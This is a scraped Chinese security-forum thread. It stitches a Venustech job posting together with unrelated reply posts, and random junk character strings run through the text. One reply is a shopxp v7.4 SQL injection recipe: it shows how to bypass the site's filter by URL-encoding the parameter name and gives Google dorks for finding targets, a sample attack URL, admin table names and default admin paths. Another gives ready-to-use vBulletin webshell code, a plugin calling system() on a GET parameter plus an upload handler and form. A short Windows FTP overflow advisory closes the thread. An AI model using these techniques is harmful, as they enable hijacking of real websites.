返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管) X* M2 ]8 C! d# c4 Y

    : w$ K( K' p. m  G  T2 r5 O8 D7 I( y- G" M% o( w. ^- K
    岗位职责:
    ' o+ Q" g$ g; \2 E' w# ~. Z# y9 m5 L# }2 s
    1.负责公司产品备机库的管理。
    - t3 Y$ {8 s- ~  y1 b3 A; u8 I. b: G9 A+ P- a2 F- h$ {
    2.产品安装调试。
    ) X" k# Y- K. z" e
    0 j5 K; \/ ?8 d2 i3.对备机使用情况做统计分析。: T8 ]3 B6 c2 C, v2 G
    ; e9 f7 m4 A) M) R4 w8 _
    岗位要求:
    5 w4 u/ c7 Z8 n  I5 H0 e1 K7 X% o$ c* ^% X6 ~6 l* z
    1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。. w4 J: ?) g, w# w* x! R2 v
    ; r; b4 z% R9 G
    2.熟悉路由器、交换机等常用网络设备。
    0 f  t. z4 p1 @
    4 N5 v! {2 W/ ~1 u+ d& Y9 i8 n3.熟悉防火墙、VPN等常见网络安全产品。6 a" w, _1 _/ |9 `

    : ]% {5 H3 m9 L; T3 _4 q& i4 D4.了解计算机硬件相关知识。
    6 O4 O" ~. g; Q) z9 c9 x, g: @- l* g+ L1 D  @1 }/ E
    5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。
    , x# g' \/ y* a6 x+ H9 r. x( F; h* `& g3 j6 o2 B, [4 }# Q9 E
    6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。9 G4 i; |6 [7 ?$ K1 s

    . [7 E) L  s" b% P发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% 2 x9 H  Z! c' S" [
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages

    * {& P2 L6 ?9 x3 i* K8 o
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if

    5 x3 \# ^- y" t
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码
    ( ^$ O$ _; s8 M( Z' n/ R1 P$ F
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:

    ) h: U) f8 j- ?8 B
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。

    ) _. u8 i2 Z) X6 C- D  X
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
    $ {: s$ M  a# J6 r- A
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
    - H. Z' v& |+ R  r- g
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。
    : o2 j9 b7 v9 x! x1 i3 o+ F
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”

    / L' H% i, G5 F9 \1 F# m
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
    6 p. a! v: x0 g' I5 e, o

    & q, i0 C" I, t6 c
    ! C: H3 [# H; F( ?# a. }& Q) I, F! m
    $ o8 C7 C6 V9 e3 h

    + w' m: c1 C- z/ _
    5 ~2 X3 v1 D  @3 y, A& j& f
    " B# ^8 Q& z& K( _6 ?
    9 @/ [: h  j+ g- T6 f, J+ i, Y  L# j* p! e0 e) G

    0 b6 X2 V6 @- l- P
    - i: K2 t+ @# D  a& i) T; `3 O) o" J) V5 o
    # p2 e# [, q9 j! Q; M

    1 u: [) V, `- p2 O: ]" [9 x
    6 p: {& m& _0 [; [
    + {/ D6 z" {4 W# V" L. Q
    # i: I* f! g* P- L) U' @
    8 a7 Y9 a/ J: p7 N! o5 o, k公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:+ x9 J) `# ~7 R' U& X* t
    首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。$ r, A+ {( @  w9 C8 R
    9 @4 F% A1 u. }3 P
    方法二:
    4 ?7 T6 A# l3 S0 {* t前边相同,代码处写一个接收上传的代码:

    / `9 w0 N* t; n9 O+ L3 `
    $target_path = "images/avatars"; //注意权限要为可写的
    ! t2 l( T3 D9 e8 Y+ a7 v# T
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    2 p' g% S2 z+ n
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 7 A9 W& b: @4 {( v6 K8 n5 E
        echo "The file ". basename( $_FILES['uploadedfile']['name']).
    4 O2 M2 t4 {5 y$ l    " has been uploaded";
    ' B' F, b! L+ v: ^. q! Z2 t+ u} else{ * c0 f2 |' f1 W( x
        echo "There was an error uploading the file, please try again!";
    . J9 ~, V. A: m8 {7 Q3 b}

    0 ~, |7 }& _* Y; u
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:
    ! z6 Y! ~% g- W4 h8 a" n
    <form enctype="multipart/form-data" action="ajax.php" method="POST">
    0 E3 t0 m" P2 [) r( V# g9 e<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    2 v; b% \3 W1 |7 `Choose a file to upload: <input name="uploadedfile" type="file" /><br /> * H2 [, X* V  g$ }7 Q# h5 H9 H9 r/ M
    <input type="hidden" name="s" value="$session[sessionhash]" /> 8 F9 \5 i, t7 p$ E4 K3 d
    <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
    ) H6 u: r. b' c5 s9 B. e<input type="submit" value="Upload File" />
    8 K  y- A; M, a1 k' J: d5 J2 Y</form>
    7 t/ K3 @4 q6 Y( Y1 u3 x% |
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用
    / C" y3 w8 j8 y! ?1 o. Z# G) I8 ~
    : z3 G6 x8 v3 q5 W
    # Y7 r% {- t1 v* }9 e& O

    ' C1 ]. ?$ F- Q
    - h2 w& |# A, H- K# E
    9 J' M" S! Y- n5 T1 ^' b+ U( K5 L# c/ x

    ! s) |* ]3 ~& i% R& i0 Z5 ^
    / F) n$ K2 j5 `$ f2 \+ m1 T+ x- {) [% I+ {/ V# w

    * F' ^6 [$ c$ p
    1 p/ Y1 X; z0 z  G( ~
    ; g/ y9 E! p5 x* |* q8 O+ L3 p6 a' U2 ]

    7 p6 @  a" f5 m9 K
    : [) O" Q* _0 z: q+ t; J( F: L/ R2 a; j6 L7 i5 t
    ) g7 E7 S. k' c5 Z* O6 ]
    ! S- i9 ]" y/ P) m
    - }% l/ q3 Q& {  W

    , F) Y2 |3 c4 ~, X1 X公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4

      ~% c0 j' F6 }- f
    描述:
    ; ?# I' `: V9 b5 `& c" L6 [
    Microsoft Windows是微软发布的非常流行的操作系统。

      }4 i* G) C$ l, \
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。
    $ t1 J, r. N( E
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。
    6 U# I9 c" F1 |4 j: ~. Q' p
    厂商补丁:

    5 r- u# \3 A7 G: q/ y7 f' D
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    0 E0 L% @% |/ D1 M
    http://www.microsoft.com/technet/security/

    9 L( q- s7 J6 `1 n1 W# v; q: c
    ' c! a2 A  u2 X) @3 R7 Z) d
    ! W# j8 o. G3 k
    $ Y+ H3 {3 g6 w, f3 m" @4 n% U( t% x& T& i+ m+ y$ P

      @0 P  V& G/ K
    3 I9 _& I; B+ Y+ i( _& X# `* V) \) @# k. T0 L+ T
    " d# q1 V* ~5 }+ K  |% R
    0 C, f8 t1 e5 r

    / ?1 _5 f! U+ z3 _5 F4 l$ v4 s5 x* S9 U
    ; f0 Y! z  A- I7 U; F- N% Z

    . C  U) [& ^& |* p) Z( b7 v0 k# i5 T% M0 P  z, e

    7 m+ \: L; t0 }- q/ N
    " q% A1 H/ ]( K9 Z  A; q1 q0 P8 C# ^) X( P3 U
    & O* ]. x% x/ h: Z7 ~, J/ }
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表